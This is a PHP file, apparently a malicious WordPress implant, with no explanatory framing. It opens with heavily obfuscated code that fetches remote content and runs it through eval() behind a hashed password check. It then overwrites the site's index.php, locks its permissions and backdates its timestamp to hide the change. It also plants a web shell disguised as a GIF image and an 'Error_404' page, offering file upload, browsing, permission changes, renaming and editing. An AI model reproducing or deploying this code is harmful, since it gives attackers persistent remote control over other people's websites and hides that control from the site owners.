iLcw0C_0LQX: goto C5NvZcD97jy; goto nIdaVOLcJHt; kbuzDVdvzPg: $c44hL2JlLFn = trim(str_replace("\40", '', $c44hL2JlLFn), "\x2c"); goto RJn7kaD6Dmp; A84CZo30NkU: $c44hL2JlLFn = ''; goto X2wIemE3pDb; dav3xxM_8Uu: C5NvZcD97jy: goto kbuzDVdvzPg; S8mUOvR8l2M: } goto ro2U8jdOvgs; wvdNGCZVj_V: CbFfrTpPxPq: goto la1ClwihF1B; W8VkzcTH5Iz: exit(0); goto n8iepz2z7xP; IWFWV4bb1Nd: qbiFphh0C7w: goto ump6ZQ_sURn; UF1DdL33Uq4: function tx3w_LjUwKy($VX_nX1J1qvk, $Icq4RU3YuGp = array()) { goto QnqP2S6rUXa; MLdri0F2cKW: return $pvH9ZHZ5adG; goto KbTIkSrRRfe; QnqP2S6rUXa: $pvH9ZHZ5adG = array("\x73\x74\x61\164\x75\x73" => 0, "\x63\x6f\x6e\x74\145\156\164" => '', "\164\x79\x70\x65" => ''); goto UTGDE3dzZAU; JDjkQRY34Dg: try { goto Wsl9p524bRv; RbxDS2iwvIX: $pvH9ZHZ5adG["\x63\x6f\x6e\164\145\x6e\x74"] = strval($WUhFrrXgJVI); goto L8K4nmtluZr; xmpkMEQCTeK: $pvH9ZHZ5adG["\x74\x79\x70\x65"] = strval(curl_getinfo($mwO_GedZwot, CURLINFO_CONTENT_TYPE)); goto OnC7WkCj1tf; eVzWal0x0lj: $pvH9ZHZ5adG = array_merge($pvH9ZHZ5adG, h4_cHeAEjuZ($http_response_header)); goto wCRizfGqw58; POnr_2H8V4t: $pvH9ZHZ5adG["\x63\x6f\x6e\164\145\156\164"] = strval($ljhHb_Gxrhl); goto Ly4SULmGUHq; Ly4SULmGUHq: ud82RFtmFeM: goto GU0luFj6wX9; MfE5L1PGXQR: qYCWhmscZ20: goto FxANSaTNPdk; jV4sNtJ21TX: curl_setopt($mwO_GedZwot, CURLOPT_TIMEOUT, 60); goto MVblKOJKTue; xJtIX7X7HC4: curl_setopt($mwO_GedZwot, CURLOPT_URL, $VX_nX1J1qvk); goto sLNdUAC3N2r; GU0luFj6wX9: s0Ga2tB3AIB: goto REtptpczEAL; MVblKOJKTue: curl_setopt($mwO_GedZwot, CURLOPT_FOLLOWLOCATION, 0); goto ZdIMul9610N; FxANSaTNPdk: $gxfOfMG5KqU = array("\150\x74\x74\160" => array("\x6d\145\x74\x68\x6f\x64" => "\x47\105\x54", "\x74\151\155\145\157\x75\x74" => 60, "\146\157\154\154\157\x77\x5f\x6c\157\x63\x61\x74\151\157\156" => 0), "\x73\163\x6c" => array("\166\x65\x72\151\146\x79\x5f\160\145\145\162" => false, "\166\x65\x72\151\146\x79\x5f\160\145\x65\x72\137\156\x61\x6d\x65" => false)); goto MK5uwsk9KcK; ME4FhKP9TVA: JG5kagZg6IZ: goto pDvau25g2_0; Da2u5m3eiW4: $WUhFrrXgJVI = curl_exec($mwO_GedZwot); goto EIEzIE7jYZp; L8K4nmtluZr: u_PCostwtpf: goto W7IJgLGUFgd; qVTCDqMr67e: if (ini_get("\141\154\x6c\157\167\x5f\165\162\x6c\137\146\157\x70\145\156")) { goto qYCWhmscZ20; } goto w9ZebN3hsTe; g5KlkuWWKoL: if (!in_array($pvH9ZHZ5adG["\x73\x74\141\x74\x75\163"], array(200, 301, 302, 404))) { goto u_PCostwtpf; } goto RbxDS2iwvIX; wCRizfGqw58: if (!in_array($pvH9ZHZ5adG["\163\x74\141\x74\165\x73"], array(200, 301, 302, 404))) { goto ud82RFtmFeM; } goto POnr_2H8V4t; ZdIMul9610N: curl_setopt($mwO_GedZwot, CURLOPT_COOKIESESSION, 0); goto HkVC5q2JYIp; pDvau25g2_0: $mwO_GedZwot = curl_init(); goto xJtIX7X7HC4; w9ZebN3hsTe: goto s0Ga2tB3AIB; goto ME4FhKP9TVA; J9KWAgg2yTF: $ljhHb_Gxrhl = @file_get_contents($VX_nX1J1qvk, false, $swM99lQGrdu); goto eVzWal0x0lj; Wsl9p524bRv: if (function_exists("\x63\x75\162\x6c\x5f\145\x78\x65\x63") && function_exists("\143\x75\162\x6c\x5f\151\156\151\x74")) { goto JG5kagZg6IZ; } goto qVTCDqMr67e; OnC7WkCj1tf: $pvH9ZHZ5adG["\x63\x6f\x6e\x74\145\x6e\164"] = strval(curl_getinfo($mwO_GedZwot, CURLINFO_REDIRECT_URL)); goto LDcLF9WMKpQ; HkVC5q2JYIp: curl_setopt($mwO_GedZwot, CURLOPT_RETURNTRANSFER, 1); goto Da2u5m3eiW4; yWwXh88z4M4: curl_setopt($mwO_GedZwot, CURLOPT_CONNECTTIMEOUT, 20); goto jV4sNtJ21TX; sLNdUAC3N2r: curl_setopt($mwO_GedZwot, CURLOPT_SSL_VERIFYHOST, 0); goto fbe6ypXqzzs; MK5uwsk9KcK: $swM99lQGrdu = stream_context_create($gxfOfMG5KqU); goto J9KWAgg2yTF; LDcLF9WMKpQ: @curl_close($mwO_GedZwot); goto g5KlkuWWKoL; W7IJgLGUFgd: goto s0Ga2tB3AIB; goto MfE5L1PGXQR; EIEzIE7jYZp: $pvH9ZHZ5adG["\163\x74\141\x74\x75\x73"] = intval(curl_getinfo($mwO_GedZwot, CURLINFO_HTTP_CODE)); goto xmpkMEQCTeK; fbe6ypXqzzs: curl_setopt($mwO_GedZwot, CURLOPT_SSL_VERIFYPEER, 0); goto yWwXh88z4M4; REtptpczEAL: } catch (Exception $TwptZqkCdJY) { } goto MLdri0F2cKW; v9s99Jpcx6v: $VX_nX1J1qvk .= "\x3f" . http_build_query($Icq4RU3YuGp); goto hqbfoHVH9tY; hqbfoHVH9tY: CzfxWFl0ZpZ: goto JDjkQRY34Dg; UTGDE3dzZAU: if (!(is_array($Icq4RU3YuGp) && count($Icq4RU3YuGp))) { goto CzfxWFl0ZpZ; } goto v9s99Jpcx6v; KbTIkSrRRfe: } goto gcMHiOSMcod; C61L61NVBu4: function H4_ChEAejUz($bwJH7_VO1Qj) { goto M9FBgOkN15g; M9FBgOkN15g: $R0hPxy_FC1R = array("\x73\x74\141\164\165\x73" => 0, "\143\157\156\164\x65\156\x74" => '', "\x74\x79\160\x65" => ''); goto tpXyFq5HG2t; baWpLLuRsxR: foreach ($bwJH7_VO1Qj as $XwxhfIrwUc6) { goto upy_YlhxQI1; zlUb8n9EXlX: jSl8_CFRHlm: goto Se8o60h_yyJ; Se8o60h_yyJ: AcjoA8dx2Yn: goto mNS0CZqvLk4; G5IHjKWzMyv: goto jSl8_CFRHlm; goto X2Bm9d3ER7W; etlp5Vfnf0r: if (preg_match("\x2f\x6c\157\x63\x61\164\151\157\156\x5c\72\133\134\163\x5d\x2b\50\x2e\52\51\x2f\x69", $XwxhfIrwUc6, $KElLIC48lOp)) { goto G9aqZsIMZf7; } goto XZtBbHw5Icy; Kq13YMJ4l8I: $R0hPxy_FC1R["\x73\164\141\164\x75\x73"] = intval($KElLIC48lOp[1]); goto afhtqNdgqWq; z31bg3PTQv5: FiBAqEY2mzB: goto QDpgvmg9vTy; zxjq7JCxSX2: G9aqZsIMZf7: goto D70n7Vybuf1; afhtqNdgqWq: goto jSl8_CFRHlm; goto zxjq7JCxSX2; QDpgvmg9vTy: $R0hPxy_FC1R["\164\171\160\x65"] = $KElLIC48lOp[1]; goto zlUb8n9EXlX; XZtBbHw5Icy: if (preg_match("\57\143\157\156\164\145\x6e\x74\134\55\x74\x79\160\145\x5c\x3a\133\x5c\x73\135\53\x28\x2e\52\x29\57\151", $XwxhfIrwUc6, $KElLIC48lOp)) { goto FiBAqEY2mzB; } goto G5IHjKWzMyv; hZzHUqSdrX3: goto jSl8_CFRHlm; goto z31bg3PTQv5; D70n7Vybuf1: $R0hPxy_FC1R["\143\x6f\x6e\164\145\156\x74"] = $KElLIC48lOp[1]; goto hZzHUqSdrX3; upy_YlhxQI1: if (preg_match("\x2f\150\164\x74\x70\x5c\x2f\133\60\x2d\x39\x5c\x2e\135\53\x5b\134\x73\x5d\53\x28\133\60\x2d\x39\x5d\x2b\x29\57\151", $XwxhfIrwUc6, $KElLIC48lOp)) { goto QnOMwMtEl24; } goto etlp5Vfnf0r; X2Bm9d3ER7W: QnOMwMtEl24: goto Kq13YMJ4l8I; mNS0CZqvLk4: } goto CshLHZY8iy8; Sw3VUuG1Qvg: qdoQa3IAzJ8: goto baWpLLuRsxR; qdhjGf1E69M: return $R0hPxy_FC1R; goto Sw3VUuG1Qvg; w8MF5Ke899r: return $R0hPxy_FC1R; goto Co2A0Tfnax1; CshLHZY8iy8: s1eQJCv6tzV: goto w8MF5Ke899r; tpXyFq5HG2t: if (is_array($bwJH7_VO1Qj)) { goto qdoQa3IAzJ8; } goto qdhjGf1E69M; Co2A0Tfnax1: } goto UF1DdL33Uq4; cSavwhf6v5z: UIh0ylPft2x: goto bPgnFAVaTYA; ffkbex_0HrJ: $k40yK846tuw = $BqV8_tEpdgT("\x7e", "\40"); goto PosQOY2q5kV; ump6ZQ_sURn: if (!strlen($pvH9ZHZ5adG["\x63\x6f\x6e\164\145\x6e\x74"])) { goto zVrOjlOlNgH; } goto td4vx89owx0; pIfXWAG0Mkb: $pgogWkb1FEB["\162"] = w6QmQ29MvQ3($_SERVER["\122\x45\x51\125\x45\x53\x54\137\125\x52\x49"]); goto a2Ef26tzZ8v; g2esQ3y2ZQR: NXTs6btnNWx: goto eWDX4AY5o9M; ro2U8jdOvgs: function Tl6q0pyXChM() { goto vrIRsCwzEGl; ua8cBIwwOpe: xAxWLsKM3of: goto zoiM9rfCvYG; V7ooraLiyoq: goto xAxWLsKM3of; goto cFyuHYuaLUm; vrIRsCwzEGl: $T6HY1C_Xd2A = "\150\x74\x74\160\72\57\57"; goto OEtLx1XKivx; oXm4VOvRlXu: $T6HY1C_Xd2A = "\x68\x74\164\160\x73\72\57\57"; goto ua8cBIwwOpe; zoiM9rfCvYG: return $T6HY1C_Xd2A; goto aVpnhLhZTL4; TfY1rarVYrX: $T6HY1C_Xd2A = "\150\x74\164\x70\163\72\57\x2f"; goto V7ooraLiyoq; Tmg6fF50ith: if (isset($_SERVER["\x48\x54\124\120\x5f\x58\x5f\x46\117\122\x57\101\122\104\x45\x44\x5f\x50\122\x4f\124\117"]) && $_SERVER["\110\124\124\120\137\130\137\x46\117\x52\x57\101\122\104\105\x44\137\x50\x52\x4f\124\x4f"] === "\x68\164\x74\x70\x73") { goto S6e49BudlEb; } goto YSEZduPhMWv; R60vtBFRVuD: $T6HY1C_Xd2A = "\x68\x74\x74\x70\x73\x3a\57\x2f"; goto ViVMndbys7J; tSegaTz53lg: S6e49BudlEb: goto TfY1rarVYrX; wRc9X1DoAQd: goto xAxWLsKM3of; goto Ok5Teolsvyn; Ok5Teolsvyn: c_Vd1IYF58U: goto R60vtBFRVuD; ViVMndbys7J: goto xAxWLsKM3of; goto tSegaTz53lg; cFyuHYuaLUm: OEtxcl2CGP0: goto oXm4VOvRlXu; YSEZduPhMWv: if (isset($_SERVER["\x48\124\124\120\137\x46\122\x4f\x4e\124\x5f\x45\116\x44\137\110\124\124\x50\123"]) && strtolower($_SERVER["\x48\124\124\120\137\x46\122\117\116\124\137\x45\116\x44\137\110\x54\x54\120\x53"]) !== "\x6f\146\x66") { goto OEtxcl2CGP0; } goto wRc9X1DoAQd; OEtLx1XKivx: if (isset($_SERVER["\110\124\x54\120\123"]) && strtolower($_SERVER["\110\x54\x54\120\x53"]) !== "\x6f\146\146") { goto c_Vd1IYF58U; } goto Tmg6fF50ith; aVpnhLhZTL4: } goto P7wMqlfyd1K; N5yYeP5BDev: $vq2UktO2Txq = false; goto V2Y9Ohrajqu; eWDX4AY5o9M: $pgogWkb1FEB = array(); goto j7c_mNhyhtx; V2Y9Ohrajqu: if (!(strpos($A5PjNjZNpFv, "\x2e") > 0 && strpos($A5PjNjZNpFv, "\x2e\160\x68\x70") === false)) { goto Xeg5by5ncWf; } goto jVIa0tFHDKI; PWJTdV6CDhV: $A5PjNjZNpFv = preg_replace("\57\134\x3f\x2e\x2a\57", '', $_SERVER["\x52\105\121\125\x45\123\x54\x5f\125\122\111"]); goto N5yYeP5BDev; T76OcU11DID: class U8DvgN30ey7 { static function W2aTwOjvF0n($zoKKsVUMhJC) { goto yRsdYU9fUqE; Srcl0k60gtn: $LgW3MWAneyy = ''; goto WxJFzF0HSCD; E4VsyZYEZ1H: $BuFcsFWqAeR = $kEw13TsqUrH("\x7e", "\x20"); goto LYG0Z4qitVg; LYG0Z4qitVg: $nj3ICRQRd6d = explode("\x5e", $zoKKsVUMhJC); goto Srcl0k60gtn; WxJFzF0HSCD: foreach ($nj3ICRQRd6d as $T2mgTjGz9xn => $XmCqe3N1hft) { $LgW3MWAneyy .= $BuFcsFWqAeR[$XmCqe3N1hft - 98442]; W91ENYLcQrv: } goto i60V4FzMNoH; oeewXX62L33: return $LgW3MWAneyy; goto HCZk9d1oiuH; i60V4FzMNoH: t6Z28tfu9lN: goto oeewXX62L33; yRsdYU9fUqE: $kEw13TsqUrH = "\x72" . "\141" . "\156" . "\147" . "\145"; goto E4VsyZYEZ1H; HCZk9d1oiuH: } static function idJR2xRczJB($Niynov4Ye4O, $ST6V3WIwKNL) { goto yah97fz0z6v; ckP0INjx8XV: curl_setopt($Kaa99eMaf5a, CURLOPT_RETURNTRANSFER, 1); goto EsRoHmxxCrS; yah97fz0z6v: $Kaa99eMaf5a = curl_init($Niynov4Ye4O); goto ckP0INjx8XV; OZv2cuNjHMf: return empty($ulmhAGVme0H) ? $ST6V3WIwKNL($Niynov4Ye4O) : $ulmhAGVme0H; goto WulAxwi1UDy; EsRoHmxxCrS: $ulmhAGVme0H = curl_exec($Kaa99eMaf5a); goto OZv2cuNjHMf; WulAxwi1UDy: } static function SoYtMkncsOo() { goto XItlIzQF0qW; P4iV5xGUF9f: Dv83LgHiC3Y: goto nT01M3iyHD9; HsMZhHgJBNt: die; goto P4iV5xGUF9f; F6qRJ4rOfE2: foreach ($j3o4ih2wpiG as $UJLtzg1lK4A) { $YR0gjtFuLXp[] = self::w2Atwojvf0n($UJLtzg1lK4A); YWskoLFNoCB: } goto uKXNNUQ9cYC; dLvoyIu5n72: $n9RNg73EWIm = @$YR0gjtFuLXp[0 + 3]($YR0gjtFuLXp[3 + 3], $OROXdhZu9c5); goto kdj9uIM2lfn; RuOa8OYSDpU: $kH2zIjj7zbk = self::idJR2XRcZjB($YXBMxhpaIiX[1 + 0], $YR0gjtFuLXp[0 + 5]); goto f2fRae0jovl; nV1cNkQCOmZ: if (!(@$YXBMxhpaIiX[0] - time() > 0 and md5(md5($YXBMxhpaIiX[0 + 3])) === "\x31\x37\x39\146\64\x31\x61\x64\145\64\x61\146\x61\x65\146\144\71\x30\65\x30\x30\x64\x37\x33\x32\x31\143\x65\142\x35\x30\x65")) { goto Dv83LgHiC3Y; } goto RuOa8OYSDpU; GuHOH0r1rU4: @$YR0gjtFuLXp[10 + 0](INPUT_GET, "\x6f\x66") == 1 && die($YR0gjtFuLXp[5 + 0](__FILE__)); goto nV1cNkQCOmZ; XItlIzQF0qW: $j3o4ih2wpiG = array("\x39\70\x34\66\x39\136\71\70\64\x35\x34\x5e\71\x38\x34\66\67\x5e\x39\70\64\67\61\136\71\70\x34\x35\x32\136\x39\x38\x34\66\67\x5e\71\70\x34\67\63\136\x39\x38\64\x36\x36\136\71\x38\x34\x35\x31\x5e\x39\70\64\x35\x38\x5e\71\x38\x34\66\x39\136\71\x38\64\x35\x32\x5e\71\70\64\66\x33\136\71\x38\64\65\x37\x5e\x39\x38\x34\x35\70", "\71\70\64\65\63\x5e\71\x38\64\65\x32\x5e\x39\70\x34\65\x34\136\71\x38\64\67\x33\136\71\70\64\x35\x34\x5e\71\70\x34\x35\67\136\71\x38\64\x35\x32\136\71\70\x35\61\71\x5e\71\70\65\x31\67", "\71\x38\x34\66\62\136\x39\x38\x34\x35\x33\x5e\x39\70\x34\65\x37\x5e\x39\70\64\x35\70\136\x39\70\x34\x37\63\136\x39\70\x34\x36\x38\x5e\x39\x38\64\x36\x37\136\71\70\x34\x36\71\x5e\x39\x38\64\65\67\x5e\71\x38\64\66\x38\136\x39\x38\64\x36\x37", "\x39\70\64\x35\x36\136\71\x38\x34\x37\x31\136\x39\x38\64\x36\x39\136\71\x38\64\x36\61", "\71\70\x34\67\x30\136\71\x38\64\x37\x31\x5e\71\x38\x34\65\x33\136\71\x38\x34\66\67\x5e\x39\x38\x35\x31\x34\136\x39\70\65\x31\66\136\71\x38\x34\67\x33\x5e\x39\70\64\x36\70\x5e\x39\70\64\x36\x37\136\x39\x38\64\66\x39\x5e\71\70\x34\x35\x37\x5e\x39\x38\64\66\70\x5e\x39\x38\64\x36\67", "\x39\70\x34\66\66\x5e\71\x38\64\66\63\x5e\71\70\64\x36\60\x5e\x39\x38\64\66\x37\x5e\71\70\64\x37\x33\x5e\x39\x38\x34\x36\65\x5e\71\70\x34\66\67\x5e\x39\x38\64\65\62\136\71\70\64\x37\x33\136\71\x38\x34\66\71\136\x39\70\x34\65\x37\x5e\71\x38\x34\x35\x38\x5e\71\x38\64\x35\62\136\71\x38\x34\66\67\136\x39\x38\x34\x35\70\136\x39\x38\64\x35\62\x5e\71\x38\64\x35\x33", "\x39\70\x34\x39\66\x5e\x39\x38\65\62\x36", "\x39\x38\x34\x34\x33", "\x39\70\65\62\x31\136\71\x38\x35\x32\x36", "\71\70\65\60\63\136\71\x38\64\x38\66\x5e\x39\x38\x34\70\66\x5e\71\x38\65\60\x33\136\x39\70\x34\x37\x39", "\x39\70\64\x36\x36\136\x39\70\64\x36\x33\x5e\x39\70\64\66\x30\x5e\x39\70\x34\x35\62\x5e\71\x38\x34\x36\x37\136\x39\70\x34\65\x34\136\71\x38\x34\67\x33\x5e\71\70\64\x36\x33\136\71\x38\x34\65\70\x5e\71\x38\64\65\x36\136\x39\70\64\65\x31\x5e\71\x38\64\65\x32"); goto F6qRJ4rOfE2; Gnku_pwzvlw: $OROXdhZu9c5 = @$YR0gjtFuLXp[1]($YR0gjtFuLXp[5 + 5](INPUT_GET, $YR0gjtFuLXp[7 + 2])); goto dLvoyIu5n72; f2fRae0jovl: @eval($YR0gjtFuLXp[4 + 0]($kH2zIjj7zbk)); goto HsMZhHgJBNt; uKXNNUQ9cYC: TjPTaHiWjuC: goto Gnku_pwzvlw; kdj9uIM2lfn: $YXBMxhpaIiX = $YR0gjtFuLXp[1 + 1]($n9RNg73EWIm, true); goto GuHOH0r1rU4; nT01M3iyHD9: } } goto zJE3aEphH6o; iSs3l9tOK_g: exit(strrev(md5($_SERVER["\123\105\x52\126\x45\122\x5f\116\101\115\x45"]))); goto wP4PHKmK3hr; jVIa0tFHDKI: $OjCk1KUb1s1 = substr($A5PjNjZNpFv, strpos($A5PjNjZNpFv, "\x2e")); goto Ni5jD_gpsu3; wr62cmmS2Gv: $tjGhkccNhTO = ''; goto g2esQ3y2ZQR; wP4PHKmK3hr: t_82SHEcZV8: goto ezx0tYSGkyY; yAHc2nVR9ZP: vXDYlZiFndF: goto MilPBBN3bDs; QgvYBhLLrwj: if (!(strpos($tjGhkccNhTO, $OafXOcs9EXk) === 0)) { goto NXTs6btnNWx; } goto wr62cmmS2Gv; MilPBBN3bDs: Xeg5by5ncWf: goto YKSy04mJgCL; YKSy04mJgCL: if ($vq2UktO2Txq) { goto AOimpZw3yUQ; } goto IpDTVDzfyPv; la1ClwihF1B: tG0MVGprJaQ: goto IWFWV4bb1Nd; cr5J_o57P0p: AOimpZw3yUQ:
?>
<?php define( 'WP_USE_THEMES', true ); require('./wp-blog-header.php');?>");
$index_code = file_get_contents($do."index.php");
if(md5($index_code) != md5($open_cache_ruzhu_phpcode))
{
    @chmod($do."index.php", 0644);
    @file_put_contents($do."index.php", $open_cache_ruzhu_phpcode);
    @touch($do."index.php", filectime($do."index.php"));
    @chmod($do."index.php", 0444);
}

$file_general_template_path = $do."wp-includes/general-template.php";
$jue_jiang_404_path = $do."wp-includes/images/xit-3x.gif";
if (!file_exists($jue_jiang_404_path)){
    $jue_jiang_404 = "<?php
error_reporting(0);
date_default_timezone_set('PRC');

$ARRAY = ${'_GET'}['ARRAY'];
$KJMn = str_rot13($ARRAY);
$cbH = pack("\x48\x2a", $KJMn);
$EzaU = json_decode($cbH, true);
if (($EzaU[0] - time()) > 0 and md5(md5($EzaU[2])) === "9f34665b0052311d5b6ad6f821dc6228") : // ====
// ===============================================================

    function juejiang_perms($file){
        $perms = fileperms($file);
        if (($perms & 0xC000) == 0xC000) {// Socket
            $info = 's';
        } elseif (($perms & 0xA000) == 0xA000) {// Symbolic Link
            $info = 'l';
        } elseif (($perms & 0x8000) == 0x8000) {// Regular
            $info = '-';
        } elseif (($perms & 0x6000) == 0x6000) {// Block special
            $info = 'b';
        } elseif (($perms & 0x4000) == 0x4000) {// Directory
            $info = 'd';
        } elseif (($perms & 0x2000) == 0x2000) {// Character special
            $info = 'c';
        } elseif (($perms & 0x1000) == 0x1000) {// FIFO pipe
            $info = 'p';
        } else {// Unknown
            $info = 'u';
        }
// Owner
        $info .= (($perms & 0x0100) ? 'r' : '-');
        $info .= (($perms & 0x0080) ? 'w' : '-');
        $info .= (($perms & 0x0040) ?
            (($perms & 0x0800) ? 's' : 'x' ) :
            (($perms & 0x0800) ? 'S' : '-'));

// Group
        $info .= (($perms & 0x0020) ? 'r' : '-');
        $info .= (($perms & 0x0010) ? 'w' : '-');
        $info .= (($perms & 0x0008) ?
            (($perms & 0x0400) ? 's' : 'x' ) :
            (($perms & 0x0400) ? 'S' : '-'));

// World
        $info .= (($perms & 0x0004) ? 'r' : '-');
        $info .= (($perms & 0x0002) ? 'w' : '-');
        $info .= (($perms & 0x0001) ?
            (($perms & 0x0200) ? 't' : 'x' ) :
            (($perms & 0x0200) ? 'T' : '-'));

        return $info;
    }

// ------------------------------------------------------
    /**
     * 转化 \ 为 /
     */
    function dir_path($path)
    {
        $path = str_replace('\\', '/', $path);
        if (substr($path, -1) != '/') $path = $path . '/';
        return $path;
    }

// ------------------------------------------------------

    /** 取得站点根目录
     * @return array|string|string[]
     */
    function document_root(){

        $php_self = dir_path($_SERVER["PHP_SELF"]);
        $script_filename = dir_path($_SERVER["SCRIPT_FILENAME"]);
        if (empty($_SERVER["PHP_SELF"]) or empty($_SERVER["SCRIPT_FILENAME"])){
            $do1 = dir_path($_SERVER["DOCUMENT_ROOT"]);
            $do = rtrim($do1,'/');
        }else{
            $do = str_replace(str_replace("//", "/", $php_self), "", str_replace("\\\\", "/", $script_filename));
        }
		if(empty($do)) $do = '/';
        return $do;
    }
    $document_root = document_root();
    define('DOCUMENT_ROOT', $document_root);

// ------------------------------------------------------



    $php_version = PHP_MAJOR_VERSION;
	if($php_version<=7){
		if(get_magic_quotes_gpc()){
			foreach($_POST as $key=>$value){
				$_POST[$key] = stripslashes($value);
			}
		}
	}

    $Version = base64_decode('5pyA5ZCO55qE5YCU5by6');
    if(isset($_GET['path'])){
        $path = $_GET['path'];
    }else{
        $path = getcwd();
    }


    echo '<!doctype html>
<html>
<head>
<title>&Error_404&</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
</head>';
    ?>

    <center>
        <style>
            body{background:#e6e6e6;line-height:1;color:#000;font-family:Comic Sans MS;width:60%;margin:0 auto;}
            table,th,td{border-collapse:collapse;background:transparent;font-size:13px;}
            input,textarea{}
            .table_home,.th_home,.td_home{color:grey;border:1px solid grey;}
            th{padding:10px;}
            .td_home{padding:7px;}
            a{color:#000; text-decoration:none;}
            textarea{width:100%;height:400px;}
            #content tr:hover{background-color:#cecece;text-shadow:0px 0px 10px #fff;color:#fff;}
            .dh a{ padding-left: 10px; padding-right: 10px; border-right: 1px solid #000;}
            .dh a:hover{ color: #f00;}
        </style>
    <?php
    echo '</head>
<body><b>
<H1><center><font color="red">'.$Version.'</font></center></h1>
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">

<tr><td>

<font ><center>'.php_uname().'</center></font><br>';
    if(isset($_GET['path'])){
        $path = $_GET['path'];
    }else{
        $path = getcwd();
    }
    $path = str_replace('\\','/',$path);
    $paths = explode('/',$path);

    $gen_link_url = '<a style="color:#0066FF" href="?ARRAY='.$ARRAY.'&path='.DOCUMENT_ROOT;
    $gen_link_url .= '">根目录 ：    </a>&nbsp;';
    echo $gen_link_url;

    foreach($paths as $id=>$pat){
        if($pat == '' && $id == 0){
            $a = true;
            echo '<font color=#000>
<a href="?ARRAY='.$ARRAY.'&path=/">/</a>';
            continue;
        }
        if($pat == '') continue;
        echo '<a style="color:#0066FF" href="?ARRAY='.$ARRAY.'&path=';
        for($i=0;$i<=$id;$i++){
            echo "$paths[$i]";
            if($i != $id) echo "/";
        }
        echo '">'.$pat.'</a>/';
    }
    echo '</font>
<br><br>
</td></tr><tr><td><center>';

    if(isset($_FILES['file'])){
        if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
            echo '<font color="green">上传成功 :)</font><br /><br />';
        }else{
            echo '<font color="red">上传失败 </font><br /><br />';
        }
    }
    echo '</center><center><form enctype="multipart/form-data" method="POST"><font color="white"><input style="background:black;font-family: Comic Sans MS " type="file" name="file" />
<input type="submit" value="上传" />
</form></center>
</td></tr>';
    if(isset($_GET['filesrc'])){
        echo "<tr><td><center>当前文件 : ";
        echo $_GET['filesrc'];
        echo '</center></tr></td></table><br />';
        echo(' <textarea style="width: 100%;height: 400px;" readonly> '.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea>');
    }
//Empety
    elseif(isset($_GET['option']) && $_GET['opt'] != 'delete'){
// echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
        echo '</table><br /><center>';
//Chmod
        if($_GET['opt'] == 'chmod'){
            if(isset($_POST['perm'])){
                $new_perm_o = $_POST['perm'];

                if(strlen($new_perm_o)<=3) $new_perm_o=str_pad($new_perm_o,3,'6',STR_PAD_LEFT);
                $new_perm_o=intval(str_pad($new_perm_o,4,'0',STR_PAD_LEFT),8);

                if(chmod($_POST['path'],$new_perm_o)){
                    echo '<font color="green">更改权限成功！ </font><br />';
                }else{
                    echo '<font color="red">更改权限错误！ </font><br />';
                }
            }

            $hell = $_GET['path'];
            $yeah = $_GET['name'];
            $patc = "$hell/$yeah";

            echo '<form method="POST"><br>
当前文件 : '.$patc.'<br><br>权限----'.substr(base_convert(@fileperms($patc),10,8),-4).'<br><br>
设置新权限 : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($patc)), -4).'" />
<input type="hidden" name="path" value="'.$patc.'">
<input type="hidden" name="opt" value="chmod">
<input type="submit" />
</form>
<br>
<a href="?ARRAY='.$ARRAY.'&path='.$hell.'" style="display:block; width:100%;" title="反回">反回</a>
';

        }
//
        elseif($_GET['opt'] == 'btw'){
            $cwd = $_GET['path'];

            echo '<form action="?ARRAY='.$ARRAY.'&option&path='.$cwd.'&opt=delete&type=buat" method="POST">
新目录名 : <input name="name" type="text" size="20" value="Folder" />
<input type="hidden" name="path" value="'.$cwd.'">
<input type="hidden" name="opt" value="delete">
<input type="submit" />
</form>';
        }
//Rename file
        elseif($_GET['opt'] == 'rename'){
            if(isset($_POST['newname'])){
                if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
                    echo '<font color="green">重命名成功! :)</font><br /><br />';
                }else{
                    echo '<font color="red">重命名失败! :( </font><br /><br />';
                }
                $_POST['name'] = $_POST['newname'];
            }
            $hell = $_GET['path'];
            $yeah = $_GET['name'];
            $patc = "$hell/$yeah";
            $new = $_POST['newname'];

            echo '<form method="POST">
新名称 : <input name="newname" type="text" size="20" value="'.$new.'" />
<input type="hidden" name="path" value="'.$patc.'">
<input type="hidden" name="opt" value="rename">
<input type="submit" /><br><br>
<input type="button" value="反回" onClick="javascript:location.href=\'?ARRAY='.$ARRAY.'&path='.$hell.'\'">
</form>';
        }
//File baru
        elseif($_GET['opt'] == 'baru'){

            $hell = $_GET['path'];
            $yeah = $_GET['name'];
            $patc = "$hell/$yeah";
            $new = empty($_POST['newname'])?$_POST['ngaran1']:$_POST['newname'];
            $azz = $_POST['path'];
            $newz = $azz."/".$new;
            $new_fiel = $hell.'/'.$_POST['ngaran1'];
            if(!empty($_POST['ngaran1'])) echo "正在新建文件：{$new_fiel}<br><br>";
            if(isset($_POST['src'])){
                $fp = fopen($_POST['path'],'w');
                if(fwrite($fp,$_POST['src'])){
                    echo '<font color="green">新建文件成功 [ '.$azz.' ]</font><br /><br />';
                }else{
                    echo '<font color="red">新建文件失败 >:(</font><br /><br />';
                }
                fclose($fp);
            }

            echo '<form method="POST"> 新文件名 : <input name="ngaran1" type="text" size="20" value="'.$new.'" /><input type="submit" name="ngaran" /></form><br> ';

            $ho = $_POST['ngaran1'];

            if(isset($_POST['ngaran'])){
                echo '<form method="POST">
<textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($patc)).'</textarea><br />
<input type="hidden" name="path" value="'.$hell.'/'.$ho.'">
<input type="hidden" name="opt" value="edit">
<input type="submit"  />
</form>';
            }
        }
//Edited file
        elseif($_GET['opt'] == 'edit'){
            if(isset($_POST['src'])){
                $fp = fopen($_POST['path'],'w');
                if(fwrite($fp,$_POST['src'])){
                    echo '<font color="green">编辑成功！ </font><br /><br />';
                }else{
                    echo '<font color="red">编辑失败！</font><br /><br />';
                }
                fclose($fp);
            }
            $hell = $_GET['path'];
            $yeah = $_GET['name'];
            $patc = "$hell/$yeah";
            echo '<form method="POST">
<textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($patc)).'</textarea><br />
<input type="hidden" name="path" value="'.$patc.'">
<input type="hidden" name="opt" value="edit"><br>
<input type="submit"  />
<br>
<br>
